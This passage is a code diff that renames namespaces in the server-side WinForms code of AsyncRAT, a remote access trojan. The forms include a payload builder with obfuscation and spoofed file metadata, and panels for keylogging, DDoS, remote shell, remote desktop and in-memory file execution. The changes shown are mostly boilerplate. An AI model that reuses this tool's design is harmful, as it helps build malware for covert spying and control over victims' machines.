this.txtPastebin.Enabled = false;
|
||||||
this.txtPastebin.Location = new System.Drawing.Point(106, 352);
|
this.txtPastebin.Location = new System.Drawing.Point(106, 352);
|
||||||
this.txtPastebin.Name = "txtPastebin";
|
this.txtPastebin.Name = "txtPastebin";
|
||||||
this.txtPastebin.Size = new System.Drawing.Size(271, 26);
|
this.txtPastebin.Size = new System.Drawing.Size(271, 26);
|
||||||
this.txtPastebin.TabIndex = 8;
|
this.txtPastebin.TabIndex = 8;
|
||||||
this.txtPastebin.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Pastebin;
|
this.txtPastebin.Text = global::Server.Properties.Settings.Default.Pastebin;
|
||||||
this.toolTip1.SetToolTip(this.txtPastebin, "IP:PORT .. Example 127.0.0.1:6606");
|
this.toolTip1.SetToolTip(this.txtPastebin, "IP:PORT .. Example 127.0.0.1:6606");
|
||||||
//
|
//
|
||||||
// label6
|
// label6
|
||||||
@ -294,13 +294,13 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// textFilename
|
// textFilename
|
||||||
//
|
//
|
||||||
this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.textFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Filename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.textFilename.Enabled = false;
|
this.textFilename.Enabled = false;
|
||||||
this.textFilename.Location = new System.Drawing.Point(103, 92);
|
this.textFilename.Location = new System.Drawing.Point(103, 92);
|
||||||
this.textFilename.Name = "textFilename";
|
this.textFilename.Name = "textFilename";
|
||||||
this.textFilename.Size = new System.Drawing.Size(271, 26);
|
this.textFilename.Size = new System.Drawing.Size(271, 26);
|
||||||
this.textFilename.TabIndex = 5;
|
this.textFilename.TabIndex = 5;
|
||||||
this.textFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Filename;
|
this.textFilename.Text = global::Server.Properties.Settings.Default.Filename;
|
||||||
//
|
//
|
||||||
// label3
|
// label3
|
||||||
//
|
//
|
||||||
@ -336,7 +336,7 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// pictureBox1
|
// pictureBox1
|
||||||
//
|
//
|
||||||
this.pictureBox1.Image = global::AsyncRAT_Sharp.Properties.Resources.uac;
|
this.pictureBox1.Image = global::Server.Properties.Resources.uac;
|
||||||
this.pictureBox1.Location = new System.Drawing.Point(175, 72);
|
this.pictureBox1.Location = new System.Drawing.Point(175, 72);
|
||||||
this.pictureBox1.Name = "pictureBox1";
|
this.pictureBox1.Name = "pictureBox1";
|
||||||
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
|
this.pictureBox1.Size = new System.Drawing.Size(32, 32);
|
||||||
@ -356,12 +356,12 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// txtMutex
|
// txtMutex
|
||||||
//
|
//
|
||||||
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtMutex.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "Mutex", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtMutex.Location = new System.Drawing.Point(106, 165);
|
this.txtMutex.Location = new System.Drawing.Point(106, 165);
|
||||||
this.txtMutex.Name = "txtMutex";
|
this.txtMutex.Name = "txtMutex";
|
||||||
this.txtMutex.Size = new System.Drawing.Size(271, 26);
|
this.txtMutex.Size = new System.Drawing.Size(271, 26);
|
||||||
this.txtMutex.TabIndex = 11;
|
this.txtMutex.TabIndex = 11;
|
||||||
this.txtMutex.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.Mutex;
|
this.txtMutex.Text = global::Server.Properties.Settings.Default.Mutex;
|
||||||
//
|
//
|
||||||
// label5
|
// label5
|
||||||
//
|
//
|
||||||
@ -482,63 +482,63 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// txtFileVersion
|
// txtFileVersion
|
||||||
//
|
//
|
||||||
this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtFileVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtFileVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtFileVersion.Enabled = false;
|
this.txtFileVersion.Enabled = false;
|
||||||
this.txtFileVersion.Location = new System.Drawing.Point(159, 368);
|
this.txtFileVersion.Location = new System.Drawing.Point(159, 368);
|
||||||
this.txtFileVersion.Name = "txtFileVersion";
|
this.txtFileVersion.Name = "txtFileVersion";
|
||||||
this.txtFileVersion.Size = new System.Drawing.Size(337, 26);
|
this.txtFileVersion.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtFileVersion.TabIndex = 19;
|
this.txtFileVersion.TabIndex = 19;
|
||||||
this.txtFileVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtFileVersion;
|
this.txtFileVersion.Text = global::Server.Properties.Settings.Default.txtFileVersion;
|
||||||
//
|
//
|
||||||
// txtProductVersion
|
// txtProductVersion
|
||||||
//
|
//
|
||||||
this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtProductVersion.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtProductVersion", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtProductVersion.Enabled = false;
|
this.txtProductVersion.Enabled = false;
|
||||||
this.txtProductVersion.Location = new System.Drawing.Point(159, 325);
|
this.txtProductVersion.Location = new System.Drawing.Point(159, 325);
|
||||||
this.txtProductVersion.Name = "txtProductVersion";
|
this.txtProductVersion.Name = "txtProductVersion";
|
||||||
this.txtProductVersion.Size = new System.Drawing.Size(337, 26);
|
this.txtProductVersion.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtProductVersion.TabIndex = 18;
|
this.txtProductVersion.TabIndex = 18;
|
||||||
this.txtProductVersion.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtProductVersion;
|
this.txtProductVersion.Text = global::Server.Properties.Settings.Default.txtProductVersion;
|
||||||
//
|
//
|
||||||
// txtOriginalFilename
|
// txtOriginalFilename
|
||||||
//
|
//
|
||||||
this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtOriginalFilename.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtOriginalFilename", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtOriginalFilename.Enabled = false;
|
this.txtOriginalFilename.Enabled = false;
|
||||||
this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280);
|
this.txtOriginalFilename.Location = new System.Drawing.Point(159, 280);
|
||||||
this.txtOriginalFilename.Name = "txtOriginalFilename";
|
this.txtOriginalFilename.Name = "txtOriginalFilename";
|
||||||
this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26);
|
this.txtOriginalFilename.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtOriginalFilename.TabIndex = 17;
|
this.txtOriginalFilename.TabIndex = 17;
|
||||||
this.txtOriginalFilename.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtOriginalFilename;
|
this.txtOriginalFilename.Text = global::Server.Properties.Settings.Default.txtOriginalFilename;
|
||||||
//
|
//
|
||||||
// txtTrademarks
|
// txtTrademarks
|
||||||
//
|
//
|
||||||
this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtTrademarks.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtTrademarks", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtTrademarks.Enabled = false;
|
this.txtTrademarks.Enabled = false;
|
||||||
this.txtTrademarks.Location = new System.Drawing.Point(159, 237);
|
this.txtTrademarks.Location = new System.Drawing.Point(159, 237);
|
||||||
this.txtTrademarks.Name = "txtTrademarks";
|
this.txtTrademarks.Name = "txtTrademarks";
|
||||||
this.txtTrademarks.Size = new System.Drawing.Size(337, 26);
|
this.txtTrademarks.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtTrademarks.TabIndex = 16;
|
this.txtTrademarks.TabIndex = 16;
|
||||||
this.txtTrademarks.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtTrademarks;
|
this.txtTrademarks.Text = global::Server.Properties.Settings.Default.txtTrademarks;
|
||||||
//
|
//
|
||||||
// txtCopyright
|
// txtCopyright
|
||||||
//
|
//
|
||||||
this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtCopyright.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCopyright", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtCopyright.Enabled = false;
|
this.txtCopyright.Enabled = false;
|
||||||
this.txtCopyright.Location = new System.Drawing.Point(159, 198);
|
this.txtCopyright.Location = new System.Drawing.Point(159, 198);
|
||||||
this.txtCopyright.Name = "txtCopyright";
|
this.txtCopyright.Name = "txtCopyright";
|
||||||
this.txtCopyright.Size = new System.Drawing.Size(337, 26);
|
this.txtCopyright.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtCopyright.TabIndex = 15;
|
this.txtCopyright.TabIndex = 15;
|
||||||
this.txtCopyright.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCopyright;
|
this.txtCopyright.Text = global::Server.Properties.Settings.Default.txtCopyright;
|
||||||
//
|
//
|
||||||
// txtCompany
|
// txtCompany
|
||||||
//
|
//
|
||||||
this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtCompany.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtCompany", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtCompany.Enabled = false;
|
this.txtCompany.Enabled = false;
|
||||||
this.txtCompany.Location = new System.Drawing.Point(159, 155);
|
this.txtCompany.Location = new System.Drawing.Point(159, 155);
|
||||||
this.txtCompany.Name = "txtCompany";
|
this.txtCompany.Name = "txtCompany";
|
||||||
this.txtCompany.Size = new System.Drawing.Size(337, 26);
|
this.txtCompany.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtCompany.TabIndex = 14;
|
this.txtCompany.TabIndex = 14;
|
||||||
this.txtCompany.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtCompany;
|
this.txtCompany.Text = global::Server.Properties.Settings.Default.txtCompany;
|
||||||
//
|
//
|
||||||
// label14
|
// label14
|
||||||
//
|
//
|
||||||
@ -596,13 +596,13 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// txtDescription
|
// txtDescription
|
||||||
//
|
//
|
||||||
this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtDescription.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "txtDescription", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtDescription.Enabled = false;
|
this.txtDescription.Enabled = false;
|
||||||
this.txtDescription.Location = new System.Drawing.Point(159, 112);
|
this.txtDescription.Location = new System.Drawing.Point(159, 112);
|
||||||
this.txtDescription.Name = "txtDescription";
|
this.txtDescription.Name = "txtDescription";
|
||||||
this.txtDescription.Size = new System.Drawing.Size(337, 26);
|
this.txtDescription.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtDescription.TabIndex = 7;
|
this.txtDescription.TabIndex = 7;
|
||||||
this.txtDescription.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.txtDescription;
|
this.txtDescription.Text = global::Server.Properties.Settings.Default.txtDescription;
|
||||||
//
|
//
|
||||||
// label7
|
// label7
|
||||||
//
|
//
|
||||||
@ -615,13 +615,13 @@ namespace AsyncRAT_Sharp.Forms
|
|||||||
//
|
//
|
||||||
// txtProduct
|
// txtProduct
|
||||||
//
|
//
|
||||||
this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::AsyncRAT_Sharp.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
this.txtProduct.DataBindings.Add(new System.Windows.Forms.Binding("Text", global::Server.Properties.Settings.Default, "ProductName", true, System.Windows.Forms.DataSourceUpdateMode.OnPropertyChanged));
|
||||||
this.txtProduct.Enabled = false;
|
this.txtProduct.Enabled = false;
|
||||||
this.txtProduct.Location = new System.Drawing.Point(159, 69);
|
this.txtProduct.Location = new System.Drawing.Point(159, 69);
|
||||||
this.txtProduct.Name = "txtProduct";
|
this.txtProduct.Name = "txtProduct";
|
||||||
this.txtProduct.Size = new System.Drawing.Size(337, 26);
|
this.txtProduct.Size = new System.Drawing.Size(337, 26);
|
||||||
this.txtProduct.TabIndex = 5;
|
this.txtProduct.TabIndex = 5;
|
||||||
this.txtProduct.Text = global::AsyncRAT_Sharp.Properties.Settings.Default.ProductName;
|
this.txtProduct.Text = global::Server.Properties.Settings.Default.ProductName;
|
||||||
//
|
//
|
||||||
// label8
|
// label8
|
||||||
//
|
//
|
@ -1,9 +1,9 @@
|
|||||||
using System;
|
using System;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Security.Cryptography;
|
using System.Security.Cryptography;
|
||||||
using AsyncRAT_Sharp.Cryptography;
|
using Server.Cryptography;
|
||||||
using System.Security.Cryptography.X509Certificates;
|
using System.Security.Cryptography.X509Certificates;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using Vestris.ResourceLib;
|
using Vestris.ResourceLib;
|
||||||
@ -11,9 +11,9 @@ using dnlib.DotNet;
|
|||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Linq;
|
using System.Linq;
|
||||||
using dnlib.DotNet.Emit;
|
using dnlib.DotNet.Emit;
|
||||||
using AsyncRAT_Sharp.RenamingObfuscation;
|
using Server.RenamingObfuscation;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormBuilder : Form
|
public partial class FormBuilder : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormCertificate
|
partial class FormCertificate
|
||||||
{
|
{
|
@ -5,7 +5,7 @@ using System.Security.Cryptography.X509Certificates;
|
|||||||
using System.IO;
|
using System.IO;
|
||||||
using System.IO.Compression;
|
using System.IO.Compression;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormCertificate : Form
|
public partial class FormCertificate : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormChat
|
partial class FormChat
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using Microsoft.VisualBasic;
|
using Microsoft.VisualBasic;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
@ -12,7 +12,7 @@ using System.Threading.Tasks;
|
|||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.Threading;
|
using System.Threading;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormChat : Form
|
public partial class FormChat : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormDOS
|
partial class FormDOS
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.ComponentModel;
|
using System.ComponentModel;
|
||||||
@ -13,7 +13,7 @@ using System.Threading;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormDOS : Form
|
public partial class FormDOS : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormDotNetEditor
|
partial class FormDotNetEditor
|
||||||
{
|
{
|
@ -10,13 +10,13 @@ using System.Text;
|
|||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using FastColoredTextBoxNS;
|
using FastColoredTextBoxNS;
|
||||||
using Microsoft.CSharp;
|
using Microsoft.CSharp;
|
||||||
using Microsoft.VisualBasic;
|
using Microsoft.VisualBasic;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormDotNetEditor : Form
|
public partial class FormDotNetEditor : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormDownloadFile
|
partial class FormDownloadFile
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.ComponentModel;
|
using System.ComponentModel;
|
||||||
@ -12,9 +12,9 @@ using System.Threading;
|
|||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Net.Sockets;
|
using System.Net.Sockets;
|
||||||
using Timer = System.Threading.Timer;
|
using Timer = System.Threading.Timer;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormDownloadFile : Form
|
public partial class FormDownloadFile : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormFileManager
|
partial class FormFileManager
|
||||||
{
|
{
|
@ -1,11 +1,11 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormFileManager : Form
|
public partial class FormFileManager : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormKeylogger
|
partial class FormKeylogger
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.ComponentModel;
|
using System.ComponentModel;
|
||||||
@ -12,7 +12,7 @@ using System.Threading;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormKeylogger : Form
|
public partial class FormKeylogger : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormPassword
|
partial class FormPassword
|
||||||
{
|
{
|
@ -8,7 +8,7 @@ using System.Text;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormPassword : Form
|
public partial class FormPassword : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormPorts
|
partial class FormPorts
|
||||||
{
|
{
|
@ -2,10 +2,10 @@
|
|||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Diagnostics;
|
using System.Diagnostics;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
using System.Security.Cryptography.X509Certificates;
|
using System.Security.Cryptography.X509Certificates;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormPorts : Form
|
public partial class FormPorts : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormProcessManager
|
partial class FormProcessManager
|
||||||
{
|
{
|
@ -8,10 +8,10 @@ using System.Text;
|
|||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormProcessManager : Form
|
public partial class FormProcessManager : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormRemoteDesktop
|
partial class FormRemoteDesktop
|
||||||
{
|
{
|
||||||
@ -84,7 +84,7 @@
|
|||||||
//
|
//
|
||||||
// btnMouse
|
// btnMouse
|
||||||
//
|
//
|
||||||
this.btnMouse.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.mouse;
|
this.btnMouse.BackgroundImage = global::Server.Properties.Resources.mouse;
|
||||||
this.btnMouse.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
this.btnMouse.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
||||||
this.btnMouse.Location = new System.Drawing.Point(550, 3);
|
this.btnMouse.Location = new System.Drawing.Point(550, 3);
|
||||||
this.btnMouse.Name = "btnMouse";
|
this.btnMouse.Name = "btnMouse";
|
||||||
@ -95,7 +95,7 @@
|
|||||||
//
|
//
|
||||||
// btnSave
|
// btnSave
|
||||||
//
|
//
|
||||||
this.btnSave.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.save_image;
|
this.btnSave.BackgroundImage = global::Server.Properties.Resources.save_image;
|
||||||
this.btnSave.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
this.btnSave.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
||||||
this.btnSave.Location = new System.Drawing.Point(455, 3);
|
this.btnSave.Location = new System.Drawing.Point(455, 3);
|
||||||
this.btnSave.Name = "btnSave";
|
this.btnSave.Name = "btnSave";
|
||||||
@ -171,7 +171,7 @@
|
|||||||
//
|
//
|
||||||
// button1
|
// button1
|
||||||
//
|
//
|
||||||
this.button1.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.stop__1_;
|
this.button1.BackgroundImage = global::Server.Properties.Resources.stop__1_;
|
||||||
this.button1.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
this.button1.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
||||||
this.button1.Location = new System.Drawing.Point(12, 3);
|
this.button1.Location = new System.Drawing.Point(12, 3);
|
||||||
this.button1.Name = "button1";
|
this.button1.Name = "button1";
|
||||||
@ -182,7 +182,7 @@
|
|||||||
//
|
//
|
||||||
// button2
|
// button2
|
||||||
//
|
//
|
||||||
this.button2.BackgroundImage = global::AsyncRAT_Sharp.Properties.Resources.arrow_up;
|
this.button2.BackgroundImage = global::Server.Properties.Resources.arrow_up;
|
||||||
this.button2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
this.button2.BackgroundImageLayout = System.Windows.Forms.ImageLayout.Stretch;
|
||||||
this.button2.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
|
this.button2.FlatStyle = System.Windows.Forms.FlatStyle.Flat;
|
||||||
this.button2.Location = new System.Drawing.Point(428, 44);
|
this.button2.Location = new System.Drawing.Point(428, 44);
|
@ -10,14 +10,14 @@ using System.Linq;
|
|||||||
using System.Text;
|
using System.Text;
|
||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using System.Threading;
|
using System.Threading;
|
||||||
using System.Drawing.Imaging;
|
using System.Drawing.Imaging;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using Encoder = System.Drawing.Imaging.Encoder;
|
using Encoder = System.Drawing.Imaging.Encoder;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormRemoteDesktop : Form
|
public partial class FormRemoteDesktop : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp
|
namespace Server
|
||||||
{
|
{
|
||||||
partial class FormSendFileToMemory
|
partial class FormSendFileToMemory
|
||||||
{
|
{
|
@ -9,9 +9,9 @@ using System.Threading.Tasks;
|
|||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
using System.IO;
|
using System.IO;
|
||||||
using System.Reflection;
|
using System.Reflection;
|
||||||
using AsyncRAT_Sharp.Helper;
|
using Server.Helper;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp
|
namespace Server
|
||||||
{
|
{
|
||||||
public partial class FormSendFileToMemory : Form
|
public partial class FormSendFileToMemory : Form
|
||||||
{
|
{
|
@ -1,4 +1,4 @@
|
|||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
partial class FormShell
|
partial class FormShell
|
||||||
{
|
{
|
@ -1,5 +1,5 @@
|
|||||||
using AsyncRAT_Sharp.MessagePack;
|
using Server.MessagePack;
|
||||||
using AsyncRAT_Sharp.Sockets;
|
using Server.Sockets;
|
||||||
using System;
|
using System;
|
||||||
using System.Collections.Generic;
|
using System.Collections.Generic;
|
||||||
using System.ComponentModel;
|
using System.ComponentModel;
|
||||||
@ -12,7 +12,7 @@ using System.Threading;
|
|||||||
using System.Threading.Tasks;
|
using System.Threading.Tasks;
|
||||||
using System.Windows.Forms;
|
using System.Windows.Forms;
|
||||||
|
|
||||||
namespace AsyncRAT_Sharp.Forms
|
namespace Server.Forms
|
||||||
{
|
{
|
||||||
public partial class FormShell : Form
|
